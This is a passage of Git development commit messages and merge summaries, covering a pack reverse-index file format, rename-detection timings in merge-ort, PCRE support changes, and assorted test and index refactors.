for a single object in a fresh clone of the kernel, Git needs to
allocate 120+ MB of memory in order to hold the reverse index in memory.
Second, the cost to sort also scales with the size of the pack.
Luckily, this is a linear function since 'load_pack_revindex()' uses a
radix sort, but this cost still must be paid once per pack per process.
As an example, it takes ~60x longer to print the _size_ of an object as
it does to print that entire object's _contents_:
Benchmark #1: git.compile cat-file --batch <obj
Time (mean ± σ): 3.4 ms ± 0.1 ms [User: 3.3 ms, System: 2.1 ms]
Range (min … max): 3.2 ms … 3.7 ms 726 runs
Benchmark #2: git.compile cat-file --batch-check="%(objectsize:disk)" <obj
Time (mean ± σ): 210.3 ms ± 8.9 ms [User: 188.2 ms, System: 23.2 ms]
Range (min … max): 193.7 ms … 224.4 ms 13 runs
Instead, avoid computing and sorting the revindex once per process by
writing it to a file when the pack itself is generated.
The format is relatively straightforward. It contains an array of
uint32_t's, the length of which is equal to the number of objects in the
pack. The ith entry in this table contains the index position of the
ith object in the pack, where "ith object in the pack" is determined by
pack offset.
One thing that the on-disk format does _not_ contain is the full (up to)
eight-byte offset corresponding to each object. This is something that
the in-memory revindex contains (it stores an off_t in 'struct
revindex_entry' along with the same uint32_t that the on-disk format
has). Omit it in the on-disk format, since knowing the index position
for some object is sufficient to get a constant-time lookup in the
pack-*.idx file to ask for an object's offset within the pack.
This trades off between the on-disk size of the 'pack-*.rev' file for
runtime to chase down the offset for some object. Even though the lookup
is constant time, the constant is heavier, since it can potentially
involve two pointer walks in v2 indexes (one to access the 4-byte offset
table, and potentially a second to access the double wide offset table).
Consider trying to map an object's pack offset to a relative position
within that pack. In a cold-cache scenario, more page faults occur while
switching between binary searching through the reverse index and
searching through the *.idx file for an object's offset. Sure enough,
with a cold cache (writing '3' into '/proc/sys/vm/drop_caches' after
'sync'ing), printing out the entire object's contents is still
marginally faster than printing its size:
Benchmark #1: git.compile cat-file --batch-check="%(objectsize:disk)" <obj >/dev/null
Time (mean ± σ): 22.6 ms ± 0.5 ms [User: 2.4 ms, System: 7.9 ms]
Range (min … max): 21.4 ms … 23.5 ms 41 runs
Benchmark #2: git.compile cat-file --batch <obj >/dev/null
Time (mean ± σ): 17.2 ms ± 0.7 ms [User: 2.8 ms, System: 5.5 ms]
Range (min … max): 15.6 ms … 18.2 ms 45 runs
(Numbers taken in the kernel after cheating and using the next patch to
generate a reverse index). There are a couple of approaches to improve
cold cache performance not pursued here:
- We could include the object offsets in the reverse index format.
Predictably, this does result in fewer page faults, but it triples
the size of the file, while simultaneously duplicating a ton of data
already available in the .idx file. (This was the original way I
implemented the format, and it did show
`--batch-check='%(objectsize:disk)'` winning out against `--batch`.)
On the other hand, this increase in size also results in a large
block-cache footprint, which could potentially hurt other workloads.
- We could store the mapping from pack to index position in more
cache-friendly way, like constructing a binary search tree from the
table and writing the values in breadth-first order. This would
result in much better locality, but the price you pay is trading
O(1) lookup in 'pack_pos_to_index()' for an O(log n) one (since you
can no longer directly index the table).
So, neither of these approaches are taken here. (Thankfully, the format
is versioned, so we are free to pursue these in the future.) But, cold
cache performance likely isn't interesting outside of one-off cases like
asking for the size of an object directly. In real-world usage, Git is
often performing many operations in the revindex (i.e., asking about
many objects rather than a single one).
The trade-off is worth it, since we will avoid the vast majority of the
cost of generating the revindex that the extra pointer chase will look
like noise in the following patch's benchmarks.
This patch describes the format and prepares callers (like in
pack-revindex.c) to be able to read *.rev files once they exist. An
implementation of the writer will appear in the next patch, and callers
will gradually begin to start using the writer in the patches that
follow after that.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Abstract accesses to in-core revindex that allows enumerating
objects stored in a packfile in the order they appear in the pack,
in preparation for introducing an on-disk precomputed revindex.
* tb/pack-revindex-api: (21 commits)
for_each_object_in_pack(): clarify pack vs index ordering
pack-revindex.c: avoid direct revindex access in 'offset_to_pack_pos()'
pack-revindex: hide the definition of 'revindex_entry'
pack-revindex: remove unused 'find_revindex_position()'
pack-revindex: remove unused 'find_pack_revindex()'
builtin/gc.c: guess the size of the revindex
for_each_object_in_pack(): convert to new revindex API
unpack_entry(): convert to new revindex API
packed_object_info(): convert to new revindex API
retry_bad_packed_offset(): convert to new revindex API
get_delta_base_oid(): convert to new revindex API
rebuild_existing_bitmaps(): convert to new revindex API
try_partial_reuse(): convert to new revindex API
get_size_by_pos(): convert to new revindex API
show_objects_for_type(): convert to new revindex API
bitmap_position_packfile(): convert to new revindex API
check_object(): convert to new revindex API
write_reused_pack_verbatim(): convert to new revindex API
write_reused_pack_one(): convert to new revindex API
write_reuse_object(): convert to new revindex API
...
Update the Code-of-conduct to version 2.0 from the upstream (we've
been using version 1.4).
* ab/coc-update-to-2.0:
CoC: update to version 2.0 + local changes
CoC: explicitly take any whitespace breakage
CoC: Update word-wrapping to match upstream
Introduce two new ways to feed configuration variable-value pairs
via environment variables, and tweak the way GIT_CONFIG_PARAMETERS
encodes variable/value pairs to make it more robust.
* ps/config-env-pairs:
config: allow specifying config entries via envvar pairs
environment: make `getenv_safe()` a public function
config: store "git -c" variables using more robust format
config: parse more robust format in GIT_CONFIG_PARAMETERS
config: extract function to parse config pairs
quote: make sq_dequote_step() a public function
config: add new way to pass config via `--config-env`
git: add `--super-prefix` to usage string
A bit of code refactoring.
* cc/write-promisor-file:
pack-write: die on error in write_promisor_file()
fetch-pack: refactor writing promisor file
fetch-pack: rename helper to create_promisor_file()
"git bundle" learns "--stdin" option to read its refs from the
standard input. Also, it now does not lose refs whey they point
at the same object.
* jx/bundle:
bundle: arguments can be read from stdin
bundle: lost objects when removing duplicate pendings
test: add helper functions for git-bundle
Clean-up docs, codepaths and tests around mailmap.
* ab/mailmap: (22 commits)
shortlog: remove unused(?) "repo-abbrev" feature
mailmap doc + tests: document and test for case-insensitivity
mailmap tests: add tests for empty "<>" syntax
mailmap tests: add tests for whitespace syntax
mailmap tests: add a test for comment syntax
mailmap doc + tests: add better examples & test them
tests: refactor a few tests to use "test_commit --append"
test-lib functions: add an --append option to test_commit
test-lib functions: add --author support to test_commit
test-lib functions: document arguments to test_commit
test-lib functions: expand "test_commit" comment template
mailmap: test for silent exiting on missing file/blob
mailmap tests: get rid of overly complex blame fuzzing
mailmap tests: add a test for "not a blob" error
mailmap tests: remove redundant entry in test
mailmap tests: improve --stdin tests
mailmap tests: modernize syntax & test idioms
mailmap tests: use our preferred whitespace syntax
mailmap doc: start by mentioning the comment syntax
check-mailmap doc: note config options
...
"git fetch" learns to treat ref updates atomically in all-or-none
fashion, just like "git push" does, with the new "--atomic" option.
* ps/fetch-atomic:
fetch: implement support for atomic reference updates
fetch: allow passing a transaction to `s_update_ref()`
fetch: refactor `s_update_ref` to use common exit path
fetch: use strbuf to format FETCH_HEAD updates
fetch: extract writing to FETCH_HEAD
When more than one commit with the same patch ID appears on one
side, "git log --cherry-pick A...B" did not exclude them all when a
commit with the same patch ID appears on the other side. Now it
does.
* jk/log-cherry-pick-duplicate-patches:
patch-ids: handle duplicate hashmap entries
Prepare tests not to be affected by the name of the default branch
"git init" creates.
* js/default-branch-name-tests-final-stretch: (28 commits)
tests: drop prereq `PREPARE_FOR_MAIN_BRANCH` where no longer needed
t99*: adjust the references to the default branch name "main"
tests(git-p4): transition to the default branch name `main`
t9[5-7]*: adjust the references to the default branch name "main"
t9[0-4]*: adjust the references to the default branch name "main"
t8*: adjust the references to the default branch name "main"
t7[5-9]*: adjust the references to the default branch name "main"
t7[0-4]*: adjust the references to the default branch name "main"
t6[4-9]*: adjust the references to the default branch name "main"
t64*: preemptively adjust alignment to prepare for `master` -> `main`
t6[0-3]*: adjust the references to the default branch name "main"
t5[6-9]*: adjust the references to the default branch name "main"
t55[4-9]*: adjust the references to the default branch name "main"
t55[23]*: adjust the references to the default branch name "main"
t551*: adjust the references to the default branch name "main"
t550*: adjust the references to the default branch name "main"
t5503: prepare aligned comment for replacing `master` with `main`
t5[0-4]*: adjust the references to the default branch name "main"
t5323: prepare centered comment for `master` -> `main`
t4*: adjust the references to the default branch name "main"
...
After expiring a reflog and making a single commit, the reflog for
the branch would record a single entry that knows both @{0} and
@{1}, but we failed to answer "what commit were we on?", i.e. @{1}
* dl/reflog-with-single-entry:
refs: allow @{n} to work with n-sized reflog
refs: factor out set_read_ref_cutoffs()
"git diff" showed a submodule working tree with untracked cruft as
"Submodule commit <objectname>-dirty", but a natural expectation is
that the "-dirty" indicator would align with "git describe --dirty",
which does not consider having untracked files in the working tree
as source of dirtiness. The inconsistency has been fixed.
* sj/untracked-files-in-submodule-directory-is-not-dirty:
diff: do not show submodule with untracked files as "-dirty"
Warn loudly when the "pack-redundant" command, which has been left
stale with almost unusable performance issues, gets used, as we no
longer want to recommend its use (instead just "repack -d" instead).
* jc/deprecate-pack-redundant:
pack-redundant: gauge the usage before proposing its removal
Newline characters in the host and path part of git:// URL are
now forbidden.
* jk/forbid-lf-in-git-url:
fsck: reject .gitmodules git:// urls with newlines
git_connect_git(): forbid newlines in host and path
The implementation of "git branch --sort" wrt the detached HEAD
display has always been hacky, which has been cleaned up.
* ab/branch-sort:
branch: show "HEAD detached" first under reverse sort
branch: sort detached HEAD based on a flag
ref-filter: move ref_sorting flags to a bitfield
ref-filter: move "cmp_fn" assignment into "else if" arm
ref-filter: add braces to if/else if/else chain
branch tests: add to --sort tests
branch: change "--local" to "--list" in comment
File-level rename detection updates.
* en/diffcore-rename:
diffcore-rename: remove unnecessary duplicate entry checks
diffcore-rename: accelerate rename_dst setup
diffcore-rename: simplify and accelerate register_rename_src()
t4058: explore duplicate tree entry handling in a bit more detail
t4058: add more tests and documentation for duplicate tree entry handling
diffcore-rename: reduce jumpiness in progress counters
diffcore-rename: simplify limit check
diffcore-rename: avoid usage of global in too_many_rename_candidates()
diffcore-rename: rename num_create to num_destinations
Rename detection is added to the "ORT" merge strategy.
* en/merge-ort-3:
merge-ort: add implementation of type-changed rename handling
merge-ort: add implementation of normal rename handling
merge-ort: add implementation of rename collisions
merge-ort: add implementation of rename/delete conflicts
merge-ort: add implementation of both sides renaming differently
merge-ort: add implementation of both sides renaming identically
merge-ort: add basic outline for process_renames()
merge-ort: implement compare_pairs() and collect_renames()
merge-ort: implement detect_regular_renames()
merge-ort: add initial outline for basic rename detection
merge-ort: add basic data structures for handling renames
"git mktag" validates its input using its own rules before writing
a tag object---it has been updated to share the logic with "git
fsck".
* ab/mktag: (23 commits)
mktag: add a --[no-]strict option
mktag: mark strings for translation
mktag: convert to parse-options
mktag: allow omitting the header/body \n separator
mktag: allow turning off fsck.extraHeaderEntry
fsck: make fsck_config() re-usable
mktag: use fsck instead of custom verify_tag()
mktag: use puts(str) instead of printf("%s\n", str)
mktag: remove redundant braces in one-line body "if"
mktag: use default strbuf_read() hint
mktag tests: test verify_object() with replaced objects
mktag tests: improve verify_object() test coverage
mktag tests: test "hash-object" compatibility
mktag tests: stress test whitespace handling
mktag tests: run "fsck" after creating "mytag"
mktag tests: don't create "mytag" twice
mktag tests: don't redirect stderr to a file needlessly
mktag tests: remove needless SHA-1 hardcoding
mktag tests: use "test_commit" helper
mktag tests: don't needlessly use a subshell
...
Improve the support for invalid UTF-8 haystacks given a non-ASCII
needle when using the PCREv2 backend.
This is a more complete fix for a bug I started to fix in
870eea8166 (grep: do not enter PCRE2_UTF mode on fixed matching,
2019-07-26), now that PCREv2 has the PCRE2_MATCH_INVALID_UTF mode we
can make use of it.
This fixes the sort of case described in 8a5999838e (grep: stess test
PCRE v2 on invalid UTF-8 data, 2019-07-26), i.e.:
- The subject string is non-ASCII (e.g. "ævar")
- We're under a is_utf8_locale(), e.g. "en_US.UTF-8", not "C"
- We are using --ignore-case, or we're a non-fixed pattern
If those conditions were satisfied and we matched found non-valid
UTF-8 data PCREv2 might bark on it, in practice this only happened
under the JIT backend (turned on by default on most platforms).
Ultimately this fixes a "regression" in b65abcafc7 ("grep: use PCRE v2
for optimized fixed-string search", 2019-07-01), I'm putting that in
scare-quotes because before then we wouldn't properly support these
complex case-folding, locale etc. cases either, it just broke in
different ways.
There was a bug related to this the PCRE2_NO_START_OPTIMIZE flag fixed
in PCREv2 10.36. It can be worked around by setting the
PCRE2_NO_START_OPTIMIZE flag. Let's do that in those cases, and add
tests for the bug.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As noted in [1] when I originally added this test in [2] the test was
completely broken as it lacked a redirect[3]. I now think this whole
thing is overly fragile. Let's only test if we have a segfault here.
Before this the first test's "test_cmp" was pretty meaningless. We
were only testing if PCREv2 was so broken that it would spew out
something completely unrelated on stdout, which isn't very plausible.
In the second test we're relying on PCREv2 forever holding to the
current behavior of the PCRE_UTF8 flag, as opposed to learning some
optimistic graceful fallback to PCRE2_MATCH_INVALID_UTF in the
future. If that happens having this test broken under bisecting would
suck.
A follow-up commit will actually test this case in a meaningful way
under the PCRE2_MATCH_INVALID_UTF flag. Let's run this one
unconditionally, and just make sure we don't segfault.
1. e714b898c6 (t7812: expect failure for grep -i with invalid UTF-8
data, 2019-11-29)
2. 8a5999838e (grep: stess test PCRE v2 on invalid UTF-8 data,
2019-07-26)
3. c74b3cbb83 (t7812: add missing redirects, 2019-11-26)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add some timing instrumentation for both merge-ort and diffcore-rename;
I used these to measure and optimize performance in both, and several
future patch series will build on these to reduce the timings of some
select testcases.
=== Setup ===
The primary testcase I used involved rebasing a random topic in the
linux kernel (consisting of 35 patches) against an older version. I
added two variants, one where I rename a toplevel directory, and another
where I only rebase one patch instead of the whole topic. The setup is
as follows:
$ git clone git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git
$ git branch hwmon-updates fd8bdb23b91876ac1e624337bb88dc1dcc21d67e
$ git branch hwmon-just-one fd8bdb23b91876ac1e624337bb88dc1dcc21d67e~34
$ git branch base 4703d9119972bf586d2cca76ec6438f819ffa30e
$ git switch -c 5.4-renames v5.4
$ git mv drivers pilots # Introduce over 26,000 renames
$ git commit -m "Rename drivers/ to pilots/"
$ git config merge.renameLimit 30000
$ git config merge.directoryRenames true
=== Testcases ===
Now with REBASE standing for either "git rebase [--merge]" (using
merge-recursive) or "test-tool fast-rebase" (using merge-ort), the
testcases are:
Testcase #1: no-renames
$ git checkout v5.4^0
$ REBASE --onto HEAD base hwmon-updates
Note: technically the name is misleading; there are some renames, but
very few. Rename detection only takes about half the overall time.
Testcase #2: mega-renames
$ git checkout 5.4-renames^0
$ REBASE --onto HEAD base hwmon-updates
Testcase #3: just-one-mega
$ git checkout 5.4-renames^0
$ REBASE --onto HEAD base hwmon-just-one
=== Timing results ===
Overall timings, using hyperfine (1 warmup run, 3 runs for mega-renames,
10 runs for the other two cases):
merge-recursive merge-ort
no-renames: 18.912 s ± 0.174 s 14.263 s ± 0.053 s
mega-renames: 5964.031 s ± 10.459 s 5504.231 s ± 5.150 s
just-one-mega: 149.583 s ± 0.751 s 158.534 s ± 0.498 s
A single re-run of each with some breakdowns:
--- no-renames ---
merge-recursive merge-ort
overall runtime: 19.302 s 14.257 s
inexact rename detection: 7.603 s 7.906 s
everything else: 11.699 s 6.351 s
--- mega-renames ---
merge-recursive merge-ort
overall runtime: 5950.195 s 5499.672 s
inexact rename detection: 5746.309 s 5487.120 s
everything else: 203.886 s 17.552 s
--- just-one-mega ---
merge-recursive merge-ort
overall runtime: 151.001 s 158.582 s
inexact rename detection: 143.448 s 157.835 s
everything else: 7.553 s 0.747 s
=== Timing observations ===
0) Maximum speedup
The "everything else" row represents the maximum speedup we could
achieve if we were to somehow infinitely parallelize inexact rename
detection, but leave everything else alone. The fact that this is so
much smaller than the real runtime (even in the case with virtually no
renames) makes it clear just how overwhelmingly large the time spent on
rename detection can be.
1) no-renames
1a) merge-ort is faster than merge-recursive, which is nice. However,
this still should not be considered good enough. Although the "merge"
backend to rebase (merge-recursive) is sometimes faster than the "apply"
backend, this is one of those cases where it is not. In fact, even
merge-ort is slower. The "apply" backend can complete this testcase in
6.940 s ± 0.485 s
which is about 2x faster than merge-ort and 3x faster than
merge-recursive. One goal of the merge-ort performance work will be to
make it faster than git-am on this (and similar) testcases.
2) mega-renames
2a) Obviously rename detection is a huge cost; it's where most the time
is spent. We need to cut that down. If we could somehow infinitely
parallelize it and drive its time to 0, the merge-recursive time would
drop to about 204s, and the merge-ort time would drop to about 17s. I
think this particular stat shows I've subtly baked a couple performance
improvements into merge-ort and into fast-rebase already.
3) just-one-mega
3a) not much to say here, it just gives some flavor for how rebasing
only one patch compares to rebasing 35.
=== Goals ===
This patch is obviously just the beginning. Here are some of my goals
that this measurement will help us achieve:
* Drive the cost of rename detection down considerably for merges
* After the above has been achieved, see if there are other slowness
factors (which would have previously been overshadowed by rename
detection costs) which we can then focus on and also optimize.
* Ensure our rebase testcase that requires little rename detection
is noticeably faster with merge-ort than with apply-based rebase.
Signed-off-by: Elijah Newren <newren@gmail.com>
Acked-by: Taylor Blau <ttaylorr@github.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
get_provisional_directory_renames() has code to detect directories being
evenly split between different locations. However, as noted previously,
if there are no new files added to that directory that was split evenly,
our inability to determine where the directory was renamed to doesn't
matter since there are no new files to try to move into the new
location. Unfortunately, that code is unaware of whether there are new
files under the directory in question and we just ignore that, causing
us to fail t6423 test 2b but pass test 2a; turn off the error for now,
swapping which tests pass and fail.
The motivating reason for switching this off as a temporary measure is
that as we add optimizations, we'll start looking at only subsets of
renames, and subsets of renames can start switching the result we get
when this error is (wrongly) on. Once we get enough optimizations,
however, we can prevent that code from even running when there are no
new files added to the relevant directory, at which point we can revert
this commit and then both testcases 2a and 2b will pass simultaneously.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a series of merges was performed (such as for a rebase or series of
cherry-picks), only the data structures allocated by the final merge
operation were being freed. The problem was that while picking out
pieces of merge-ort to upstream, I previously misread a certain section
of merge_start() and assumed it was associated with a later
optimization. Include that section now, which ensures that if there was
a previous merge operation, that we clear out result->priv and then
re-use it for opt->priv, and otherwise we allocate opt->priv.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove support for using version 1 of the PCRE library. Its use has
been discouraged by upstream for a long time, and it's in a
bugfix-only state.
Anyone who was relying on v1 in particular got a nudge to move to v2
in e6c531b808 (Makefile: make USE_LIBPCRE=YesPlease mean v2, not v1,
2018-03-11), which was first released as part of v2.18.0.
With this the LIBPCRE2 test prerequisites is redundant to PCRE. But
I'm keeping it for self-documentation purposes, and to avoid conflict
with other in-flight PCRE patches.
I'm also not changing all of our own "pcre2" names to "pcre", i.e. the
inverse of 6d4b5747f0 (grep: change internal *pcre* variable &
function names to be *pcre1*, 2017-05-25). I don't see the point, and
it makes the history/blame harder to read. Maybe if there's ever a
PCRE v3...
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove a flag added in my fb95e2e38d (grep: un-break building with
PCRE >= 8.32 without --enable-jit, 2017-06-01). It's set just below
USE_LIBPCRE=YesPlease, so it's been redundant since
e6c531b808 (Makefile: make USE_LIBPCRE=YesPlease mean v2, not v1,
2018-03-11).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
These also document some behaviors that differ from a full checkout, and
possibly in a way that is not intended.
The test is designed to be run with "--run=1,X" where 'X' is an
interesting test case. Each test uses 'init_repos' to reset the full and
sparse copies of the initial-repo that is created by the first test
case. This also makes it possible to have test cases leave the working
directory or index in unusual states without disturbing later cases.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
From ff15d509b89edd4830d85d53cea3079a6b0c1c08 Mon Sep 17 00:00:00 2001
From: Derrick Stolee <dstolee@microsoft.com>
Date: Mon, 11 Jan 2021 08:53:09 -0500
Subject: [PATCH 8/9] test-lib: test_region looks for trace2 regions
Most test cases can verify Git's behavior using input/output
expectations or changes to the .git directory. However, sometimes we
want to check that Git did or did not run a certain section of code.
This is particularly important for performance-only features that we
want to ensure have been enabled in certain cases.
Add a new 'test_region' function that checks if a trace2 region was
entered and left in a given trace2 event log.
There is one existing test (t0500-progress-display.sh) that performs
this check already, so use the helper function instead. Note that this
changes the expectations slightly. The old test (incorrectly) used two
patterns for the 'grep' invocation, but this performs an OR of the
patterns, not an AND. This means that as long as one region_enter event
was logged, the test would succeed, even if it was not due to the
progress category.
More uses will be added in a later change.
t6423-merge-rename-directories.sh also greps for region_enter lines, but
it verifies the number of such lines, which is not the same as an
existence check.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A future feature will want to load the sparse-checkout patterns into a
pattern_list, but the current mechanism to do so is a bit complicated.
This is made difficult due to needing to find the sparse-checkout file
in different ways throughout the codebase.
The logic implemented in the new get_sparse_checkout_patterns() was
duplicated in populate_from_existing_patterns() in unpack-trees.c. Use
the new method instead, keeping the logic around handling the struct
unpack_trees_options.
The callers to get_sparse_checkout_filename() in
builtin/sparse-checkout.c manipulate the sparse-checkout file directly,
so it is not appropriate to replace logic in that file with
get_sparse_checkout_patterns().
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The lazy_init_name_hash() populates a hashset with all filenames and
another with all directories represented in the index. This is run only
if we need to use the hashsets to check for existence or case-folding
renames.
Place trace2 regions where there is already a performance trace.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It will be helpful to add behavior to index operations that might
trigger an object lookup. Since each index belongs to a specific
repository, add a 'repo' pointer to struct index_state that allows
access to this repository.
Add a BUG() statement if the repo already has an index, and the index
already has a repo, but somehow the index points to a different repo.
This will prevent future changes from needing to pass an additional
'struct repository *repo' parameter and instead rely only on the 'struct
index_state *istate' parameter.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The index has an fsmonitor_dirty bitmap that records which index entries
are "dirty" based on the response from the FSMonitor. If this bitmap
ever grows larger than the index, then there was an error in how it was
constructed, and it was probably a developer's bug.
There are several BUG() statements that are very similar, so replace
these uses with a simpler assert_index_minimum(). Since there is one
caller that uses a custom 'pos' value instead of the bit_size member, we
cannot simplify it too much. However, the error string is identical in
each, so this simplifies things.
Be sure to add one when checking if a position if valid, since the
minimum is a bound on the expected size.
The end result is that the code is simpler to read while also preserving
these assertions for developers in the FSMonitor space.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This method will be helpful to use outside of cache-tree.c in a later
feature. The implementation is subtle due to subtree_name_cmp() sorting
by length and then lexicographically.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The verify_cache() method takes an array of cache entries and a count,
but these are always provided directly from a struct index_state. Use
a pointer to the full structure instead.
There is a subtle point when istate->cache_nr is zero that subtracting
one will underflow. This triggers a failure in t0000-basic.sh, among
others. Use "i + 1 < istate->cache_nr" to avoid these strange
comparisons. Convert i to be unsigned as well, which also removes the
potential signed overflow in the unlikely case that cache_nr is over 2.1
billion entries. The 'funny' variable has a maximum value of 11, so
making it unsigned does not change anything of importance.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make the method safer by allocating a cache_tree member for the given
index_state if it is not already present. This is preferrable to a
BUG() statement or returning with an error because future callers will
want to populate an empty cache-tree using this method.
Callers can also remove their conditional allocations of cache_tree.
Also drop local variables that can be found directly from the 'istate'
parameter.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change a test initially added in 50cd31c652 (t3600: comment on
inducing SIGPIPE in `git rm`, 2019-11-27) to explicitly test for
SIGPIPE using a pattern initially established in 7559a1be8a (unblock
and unignore SIGPIPE, 2014-09-18).
The problem with using that pattern is that it requires us to skip the
test on MINGW[1]. If we kept the test with its initial semantics[2]
we'd get coverage there, at the cost of not checking whether we
actually had SIGPIPE outside of MinGW.
Arguably we should just remove this test. Between the test added in
7559a1be8a and the change made in 12e0437f23 (common-main: call
restore_sigpipe_to_default(), 2016-07-01) it's a bit arbitrary to only
check this for "git rm".
But in lieu of having wider test coverage for other "git" subcommands
let's refactor this to explicitly test for SIGPIPE outside of MinGW,
and then just that we remove the ".git/index.lock" (as before) on all
platforms.
1. https://lore.kernel.org/git/xmqq1rec5ckf.fsf@gitster.c.googlers.com/
2. 0693f9ddad (Make sure lockfiles are unlocked when dying on SIGPIPE,
2008-12-18)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change an invocation of zipinfo added in 19ee29401d (t5004: test ZIP
archives with many entries, 2015-08-22) to simply ask zipinfo for the
header info, rather than spewing out info about the entire archive and
race to kill it with SIGPIPE due to the downstream "head -2".
I ran across this because I'm adding a "set -o pipefail" test
mode. This won't be needed for the version of the mode that I'm
introducing (which currently relies on a patch to GNU bash), but I
think this is a good idea anyway.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Continue changing a test that 763b47bafa (t5703: stop losing return
codes of git commands, 2019-11-27) already refactored.
This was originally added as part of a series to add support for
running under bash's "set -o pipefail", under that mode this test will
fail because sometimes there's no commits in the "objs" output.
It's easier to fix that than exempt these tests under a hypothetical
"set -o pipefail" test mode. It looks like we probably won't have
that, but once we've dug this code up let's refactor it[2] so we don't
hide a potential pipe failure.
1. https://lore.kernel.org/git/xmqqzh18o8o6.fsf@gitster.c.googlers.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rewrite a brittle tests which used "rev-list" without "--[no-]merges"
to figure out if a set of commits turned into merge commits or not.
Signed-off-by: Jeff King <peff@peff.net>
[ÆAB: wrote commit message]
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor some old-style test code to use test_must_be_empty instead of
"test -z". This makes a follow-up commit easier to read.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use "<file" instead of "< file", and don't put the closing quote for
strings on an indented line. This makes a follow-up refactoring commit
easier to read.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The test code added in 9c4d6c0297 (cache-tree: Write updated
cache-tree after commit, 2014-07-13) used "ls-files" in lieu of
"ls-tree" because it wanted to test the data in the index, since this
test is testing the cache-tree extension.
Change the test to instead use "ls-tree" for traversal, and then
explicitly check how HEAD differs from the index. This is more easily
understood, and less fragile as numerous past bug fixes[1][2][3] to
the old code we're replacing demonstrate.
As an aside this would be a bit easier if empty pathspecs hadn't been
made an error in d426430e6e (pathspec: warn on empty strings as
pathspec, 2016-06-22) and 9e4e8a64c2 (pathspec: die on empty strings
as pathspec, 2017-06-06).
If that was still allowed this code could be simplified slightly:
diff --git a/t/t0090-cache-tree.sh b/t/t0090-cache-tree.sh
index 9bf66c9e68..0b02881f55 100755
--- a/t/t0090-cache-tree.sh
+++ b/t/t0090-cache-tree.sh
@@ -18,19 +18,18 @@ cmp_cache_tree () {
# test-tool dump-cache-tree already verifies that all existing data is
# correct.
generate_expected_cache_tree () {
- pathspec="$1" &&
- dir="$2${2:+/}" &&
+ pathspec="$1${1:+/}" &&
git ls-tree --name-only HEAD -- "$pathspec" >files &&
git ls-tree --name-only -d HEAD -- "$pathspec" >subtrees &&
- printf "SHA %s (%d entries, %d subtrees)\n" "$dir" $(wc -l <files) $(wc -l <subtrees) &&
+ printf "SHA %s (%d entries, %d subtrees)\n" "$pathspec" $(wc -l <files) $(wc -l <subtrees) &&
while read subtree
do
- generate_expected_cache_tree "$pathspec/$subtree/" "$subtree" || return 1
+ generate_expected_cache_tree "$subtree" || return 1
done <subtrees
}
test_cache_tree () {
- generate_expected_cache_tree "." >expect &&
+ generate_expected_cache_tree >expect &&
cmp_cache_tree expect &&
rm expect actual files subtrees &&
git status --porcelain -- ':!status' ':!expected.status' >status &&
1. c8db708d5d (t0090: avoid passing empty string to printf %d,
2014-09-30)
2. d69360c6b1 (t0090: tweak awk statement for Solaris
/usr/xpg4/bin/awk, 2014-12-22)
3. 9b5a9fa60a (t0090: stop losing return codes of git commands,
2019-11-27)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the $2 paramater. This appears to have been some
work-in-progress code from an earlier version of
9c4d6c0297 (cache-tree: Write updated cache-tree after commit,
2014-07-13) which was left in the final version.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor the cache-tree test file to use our current recommended
patterns. This makes a subsequent meaningful change easier to read.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
During a merge conflict, the name of a file may appear multiple
times in "git ls-files" output, once for each stage. If you use
both `--delete` and `--modify` at the same time, the output may
mention a deleted file twice.
When none of the '-t', '-u', or '-s' options is in use, these
duplicate entries do not add much value to the output.
